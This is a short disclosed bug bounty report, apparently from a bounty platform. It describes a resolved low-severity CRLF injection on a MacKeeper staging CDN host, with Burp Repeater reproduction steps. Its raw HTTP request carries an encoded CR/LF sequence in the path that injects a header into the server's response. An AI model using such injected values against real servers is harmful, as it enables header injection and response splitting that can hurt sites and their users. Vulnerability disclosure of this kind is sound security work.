CRLF Injection - http://stage-static-cdn.mackeeper.com/
Low
C
Clario
Submitted None
Team Summary
Official summary from Clario
### Summary CRLF Injection - `http://stage-static-cdn.mackeeper.com/` ### Steps To Reproduce In the rawRequest we have added `'%0D%0Avirus:%20value'` In Burp Repeater copy and paste the below rawRequest Notice the response with header added ``` ------rawRequest---------- GET /%0D%0Avirus:%20value HTTP/1.1 Connection: keep-alive Accept: / Accept-Encoding: gzip,deflate Host: stage-static-cdn.mackeeper.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0 ------rawRequest---------- ```
Actions:
Reported by
kphaks
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$50.00
Submitted
Weakness
CRLF Injection